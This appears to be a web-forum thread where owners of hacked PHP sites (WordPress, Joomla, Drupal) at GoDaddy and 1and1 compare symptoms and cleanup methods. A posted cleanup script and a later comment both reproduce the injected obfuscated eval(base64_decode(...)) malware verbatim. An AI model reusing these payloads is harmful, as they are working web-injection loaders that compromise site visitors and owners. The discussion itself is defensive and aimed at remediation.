Site Hacked

@redkathy – you can export your database. Make sure it’s a .sql file before viewing… if it’s a zip file, unzip it first.

Then use a program like WordPad to open the file so you can view it.

You can then do a Find search for whatever it is you’re looking for.

@wpbloghost -Thanks for the instruction. The first attack I was so very lost, it took forever to clean the sites. This time not so bad. I hope we don’t get used to doing this ??

@wpbloghost – export and back up file, the same thing?

Yes.

Worth the read . .

Anonymous said…

I was called in to look at some hosting servers at a small company that got hit with something similar to this earlier this year. Their hosted sites were php, asp and coldfusion sites (no wordpress, joomla or any sort of control panel). All index/home/main/default files – regardless of whether they were php, asp, cfm or even html had various javascripts included. It certainly looked like it was an FTP exploit with either privilege escalation so their bot could traverse user directories and write, or they somehow got the ftp user/pass db. Logs did not indicate brute force attacks. File changes came from multiple locations around the world.

All,

We’ve posted instructions for fixing the issue at https://fwd4.me/MFK. Please make sure that you follow all of the steps, including the ‘permanent fix’.

Salem

ok the solution go daddy is giving respectfully is useless,

my website has joomla installed and is hosted in a godaddy server, I’m proud to say I have completely removed the virus using my own scripting skills, all it took was 10 mins. the virus is hardly that, its just code that somehow bypassed godaddy’s security and was able to write itself to all php files.

this is the script I developed and used with success,
its kind of tricky, you need to do a couple of things before using the script

run this command in the SSH: find . -name “*.php” -type f -print?

that will display all PHP files in your directory including subdirectories

if you dont know how to execute it just use a cron job it should email it to you with no problem,

now you save it in a txt file named “php.txt”

upload php.txt with anything.php, anything.php contains the following:
(please change what i ask you to change)
the script isint perfect but should do the job ,

only use this as a last resort, backup your website before use as well. just incase

<?php
  $files = file_get_contents('php.txt');

  $afiles= explode("\n", $files);

   for($i=0;$i<count($afiles);$i++){ //you mite want to lessen the loops if your website is big
    qabandi($afiles[$i]);
   }

 function qabandi($file){
$sick = "{rest of location}".trim($file);//this is where you add the rest of location
$content = file_get_contents($sick);
$handle = fopen($sick, "w+");

$clean = str_replace(bad(), "", $content);

fwrite($handle,$clean);
fclose($handle);
echo($sick."[cleaned]\n");

}

 function bad(){ return base64_decode("PD9waHAgLyoqLyBldmFsKGJhc2U2NF9kZWNvZGUoImFXWW9ablZ1WTNScGIyNWZaWGhwYzNSektD
ZHZZbDl6ZEdGeWRDY3BKaVloYVhOelpYUW9KRWRNVDBKQlRGTmJKMjF5WDI1dkoxMHBLWHNnSUNB
a1IweFBRa0ZNVTFzbmJYSmZibThuWFQweE95QWdJR2xtS0NGbWRXNWpkR2x2Ymw5bGVHbHpkSE1v
SjIxeWIySm9KeWtwZXlBZ0lDQWdJR2xtS0NGbWRXNWpkR2x2Ymw5bGVHbHpkSE1vSjJkdGJDY3BL
WHNnSUNBZ0lHWjFibU4wYVc5dUlHZHRiQ2dwZXlBZ0lDQWdJR2xtSUNnaGMzUnlhWE4wY2lna1gx
TkZVbFpGVWxzaVNGUlVVRjlWVTBWU1gwRkhSVTVVSWwwc0ltZHZiMmRzWldKdmRDSXBKaVlnS0NG
emRISnBjM1J5S0NSZlUwVlNWa1ZTV3lKSVZGUlFYMVZUUlZKZlFVZEZUbFFpWFN3aWVXRm9iMjhp
S1NrcGV5QWdJQ0FnSUNCeVpYUjFjbTRnWW1GelpUWTBYMlJsWTI5a1pTZ2lVRWhPYW1OdGJIZGtR
MEo2WTIxTk9VbHRhREJrU0VFMlRIazVjbHBIY0hKYWJYQjZZVEpTYldGdGVIcGhNbEp4V21rMWFt
SXlNSFpoTTBGMVkwZG9kMGxxTkRoTU0wNXFZMjFzZDJSRU5EMGlLVHNnSUNBZ0lDQjlJQ0FnSUNB
Z2NtVjBkWEp1SUNJaU95QWdJQ0FnZlNBZ0lDQjlJQ0FnSUNBZ0lDQnBaaWdoWm5WdVkzUnBiMjVm
WlhocGMzUnpLQ2RuZW1SbFkyOWtaU2NwS1hzZ0lDQWdJR1oxYm1OMGFXOXVJR2Q2WkdWamIyUmxL
Q1JTTlVFNVEwWXhRalE1TnpVd01rRkRRVEl6UXpoR05qRXhRVFUyTkRZNE5FTXBleUFnSUNBZ0lD
UlNNekJDTWtGQ09FUkRNVFE1TmtRd05rSXlNekJCTnpGRU9EazJNa0ZHTlVROVFHOXlaQ2hBYzNW
aWMzUnlLQ1JTTlVFNVEwWXhRalE1TnpVd01rRkRRVEl6UXpoR05qRXhRVFUyTkRZNE5FTXNNeXd4
S1NrN0lDQWdJQ0FnSkZKQ1JUUkRORVF3TXpkRk9UTTVNakkyUmpZMU9ERXlPRGcxUVRVelJFRkVP
VDB4TURzZ0lDQWdJQ0FrVWtFelJEVXlSVFV5UVRRNE9UTTJRMFJGTUVZMU16VTJRa0l3T0RZMU1r
WXlQVEE3SUNBZ0lDQWdhV1lvSkZJek1FSXlRVUk0UkVNeE5EazJSREEyUWpJek1FRTNNVVE0T1RZ
eVFVWTFSQ1kwS1hzZ0lDQWdJQ0FnSkZJMk0wSkZSRVUyUWpFNU1qWTJSRFJGUmtWQlJEQTNRVFJF
T1RGRk1qbEZRajFBZFc1d1lXTnJLQ2QySnl4emRXSnpkSElvSkZJMVFUbERSakZDTkRrM05UQXlR
VU5CTWpORE9FWTJNVEZCTlRZME5qZzBReXd4TUN3eUtTazdJQ0FnSUNBZ0lDUlNOak5DUlVSRk5r
SXhPVEkyTmtRMFJVWkZRVVF3TjBFMFJEa3hSVEk1UlVJOUpGSTJNMEpGUkVVMlFqRTVNalkyUkRS
RlJrVkJSREEzUVRSRU9URkZNamxGUWxzeFhUc2dJQ0FnSUNBZ0pGSkNSVFJETkVRd016ZEZPVE01
TWpJMlJqWTFPREV5T0RnMVFUVXpSRUZFT1NzOU1pc2tVall6UWtWRVJUWkNNVGt5TmpaRU5FVkdS
VUZFTURkQk5FUTVNVVV5T1VWQ095QWdJQ0FnSUgwZ0lDQWdJQ0JwWmlna1VqTXdRakpCUWpoRVF6
RTBPVFpFTURaQ01qTXdRVGN4UkRnNU5qSkJSalZFSmpncGV5QWdJQ0FnSUNBa1VrSkZORU0wUkRB
ek4wVTVNemt5TWpaR05qVTRNVEk0T0RWQk5UTkVRVVE1UFVCemRISndiM01vSkZJMVFUbERSakZD
TkRrM05UQXlRVU5CTWpORE9FWTJNVEZCTlRZME5qZzBReXhqYUhJb01Da3NKRkpDUlRSRE5FUXdN
emRGT1RNNU1qSTJSalkxT0RFeU9EZzFRVFV6UkVGRU9Ta3JNVHNnSUNBZ0lDQjlJQ0FnSUNBZ2FX
WW9KRkl6TUVJeVFVSTRSRU14TkRrMlJEQTJRakl6TUVFM01VUTRPVFl5UVVZMVJDWXhOaWw3SUNB
Z0lDQWdJQ1JTUWtVMFF6UkVNRE0zUlRrek9USXlOa1kyTlRneE1qZzROVUUxTTBSQlJEazlRSE4w
Y25CdmN5Z2tValZCT1VOR01VSTBPVGMxTURKQlEwRXlNME00UmpZeE1VRTFOalEyT0RSRExHTm9j
aWd3S1N3a1VrSkZORU0wUkRBek4wVTVNemt5TWpaR05qVTRNVEk0T0RWQk5UTkVRVVE1S1NzeE95
QWdJQ0FnSUgwZ0lDQWdJQ0JwWmlna1VqTXdRakpCUWpoRVF6RTBPVFpFTURaQ01qTXdRVGN4UkRn
NU5qSkJSalZFSmpJcGV5QWdJQ0FnSUNBa1VrSkZORU0wUkRBek4wVTVNemt5TWpaR05qVTRNVEk0
T0RWQk5UTkVRVVE1S3oweU95QWdJQ0FnSUgwZ0lDQWdJQ0FrVWpBek5FRkZNa0ZDT1RSR09UbERR
emd4UWpNNE9VRXhPREl5UkVFek16VXpQVUJuZW1sdVpteGhkR1VvUUhOMVluTjBjaWdrVWpWQk9V
TkdNVUkwT1RjMU1ESkJRMEV5TTBNNFJqWXhNVUUxTmpRMk9EUkRMQ1JTUWtVMFF6UkVNRE0zUlRr
ek9USXlOa1kyTlRneE1qZzROVUUxTTBSQlJEa3BLVHNnSUNBZ0lDQnBaaWdrVWpBek5FRkZNa0ZD
T1RSR09UbERRemd4UWpNNE9VRXhPREl5UkVFek16VXpQVDA5UmtGTVUwVXBleUFnSUNBZ0lDQWtV
akF6TkVGRk1rRkNPVFJHT1RsRFF6Z3hRak00T1VFeE9ESXlSRUV6TXpVelBTUlNOVUU1UTBZeFFq
UTVOelV3TWtGRFFUSXpRemhHTmpFeFFUVTJORFk0TkVNN0lDQWdJQ0FnZlNBZ0lDQWdJSEpsZEhW
eWJpQWtVakF6TkVGRk1rRkNPVFJHT1RsRFF6Z3hRak00T1VFeE9ESXlSRUV6TXpVek95QWdJQ0Fn
ZlNBZ0lDQjlJQ0FnSUdaMWJtTjBhVzl1SUcxeWIySm9LQ1JTUlRneVJVVTVRakV5TVVZM01EazRP
VFZGUmpVMFJVSkJOMFpCTmtJM09FSXBleUFnSUNBZ1NHVmhaR1Z5S0NkRGIyNTBaVzUwTFVWdVky
OWthVzVuT2lCdWIyNWxKeWs3SUNBZ0lDQWtVa0V4TnpsQlFrUXpRVGRDT1VVeU9FTXpOamxHTjBJ
MU9VTTFNVUk0TVVSRlBXZDZaR1ZqYjJSbEtDUlNSVGd5UlVVNVFqRXlNVVkzTURrNE9UVkZSalUw
UlVKQk4wWkJOa0kzT0VJcE95QWdJQ0FnSUNCcFppaHdjbVZuWDIxaGRHTm9LQ2N2WER4Y0wySnZa
SGt2YzJrbkxDUlNRVEUzT1VGQ1JETkJOMEk1UlRJNFF6TTJPVVkzUWpVNVF6VXhRamd4UkVVcEtY
c2dJQ0FnSUNCeVpYUjFjbTRnY0hKbFoxOXlaWEJzWVdObEtDY3ZLRnc4WEM5aWIyUjVXMTVjUGww
cVhENHBMM05wSnl4bmJXd29LUzRpWEc0aUxpY2tNU2NzSkZKQk1UYzVRVUpFTTBFM1FqbEZNamhE
TXpZNVJqZENOVGxETlRGQ09ERkVSU2s3SUNBZ0lDQjlaV3h6WlhzZ0lDQWdJQ0J5WlhSMWNtNGdK
RkpCTVRjNVFVSkVNMEUzUWpsRk1qaERNelk1UmpkQ05UbEROVEZDT0RGRVJTNW5iV3dvS1RzZ0lD
QWdJSDBnSUNBZ2ZTQWdJQ0J2WWw5emRHRnlkQ2duYlhKdlltZ25LVHNnSUNCOUlDQjkiKSk7Pz4=");}function good(){return base64_decode("PD9QSFAgLyphbC1xYWJhbmRpQGhvdG1haWwuY29tKi8gPz4=");}

?>

These criminals have discovered serious vulnerabilities in many popular hosting companies, and these companies must step up their effort to protect their customers.

That’s really the bottom line.

In the mean time, it is clear that not only WP sites were attacked on Godaddy (I run a Drupal site, and it was attacked too. The “base64_decode” line was injected into every single .PHP file.

While it is clear how to restore the site, what I have not seen so far is what Godaddy is doing to recognize the problem is not WP or any other CMS, but a vulnerability on their side.

can’t cure a sick person if the sick person does not recognize he is sick.

Peter

Yes I agree petercasier, It is not a vulnerability in wordpress,joomla or drupal, its a vulnerability in godaddy itself as a host, this is very disappointing I must say.

can anyone locate where these hackers are from!!????

this is not funny!!

I also got hacked. ALL the .php files on my site(s) are infected with the following:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9rdW5kZW4vaG9tZXBhZ2VzLzEvZDE3MjUyNDQ1Mi9odGRvY3MvYmxvZy93cC1pbmNsdWRlcy9qcy90aW55bWNlL3BsdWdpbnMvaW5saW5lcG9wdXBzL3NraW5zL2NsZWFybG9va3MyL2ltZy9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>

And there were some strange additions to the .htaccess file in the logs folder. I’m hosted by 1and1.com and have sent them a ticket on this but haven’t heard back yet. From what I’ve read here it’s not just WordPress and it’s also pretty widespread.

What ticks me off is the amount of work I had to do for just ONE of my blogs to clean up this crap (including replacing the MySQL database) and I can’t bear the thought of having to do that for EACH AND EVERY ONE of my other sites.

Is there some kind of script or some mojo thingee that can grind through all this and remove it? I’m not enough of a code monkey to figure it out myself – I only know enough to screw things up unless I have very clear instructions.

Anyone? Anyone? Bueller?

thanks